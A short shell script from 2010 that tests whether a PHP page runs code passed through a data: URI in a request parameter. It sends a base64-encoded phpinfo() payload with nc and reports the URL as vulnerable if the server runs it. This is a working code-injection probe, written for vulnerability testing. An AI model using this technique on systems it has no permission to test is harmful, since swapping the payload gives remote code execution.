#!/bin/sh

# PHP data stream remote include checker
#
# Copyright (C) 2010  Jeremy Bae
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#

function usage
{
  echo "Usage: $0 <url> <arg> [other args]"
  exit
}

if [ $# -lt 2 ]; then
  usage
fi

PATTERN='data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=='

URL=$1
PARAM=$2
OTHER=$3

STRLEN=`expr "$OTHER" : '.*'`
if [ $STRLEN -gt 0 ]
then
  OTHER="&$OTHER"
fi

TEMP=`echo $URL | awk 'BEGIN { FS="/" } { print $3 }'`
HOST=`echo $TEMP | awk 'BEGIN { FS=":" } { print $1 }'`
PORT=`echo $TEMP | awk 'BEGIN { FS=":" } { print $2 }'`
REQ=`echo $URL | awk 'BEGIN { FS="/" } { for (i=4; i<NF; i++) printf("%s/",$i) }'`
FILENAME=`echo $URL | awk 'BEGIN { FS="/" } { print $NF }'`
EXT=`echo $FILENAME | awk 'BEGIN { FS="." } { print $NF }'`

if [ -z $PORT ]
then
  PORT=80
fi
  
RESULT=`echo -e "GET /$REQ$FILENAME?$PARAM=$PATTERN$OTHER HTTP/1.0\n\n" | nc $HOST $PORT | grep "SERVER_SOFTWARE"`
STRLEN=`expr "$RESULT" : '.*'`
if [ $STRLEN -gt 0 ]
then
  echo "http://$HOST:$PORT/$REQ$FILENAME?$PARAM=$PATTERN$OTHER is vulnerable"
fi
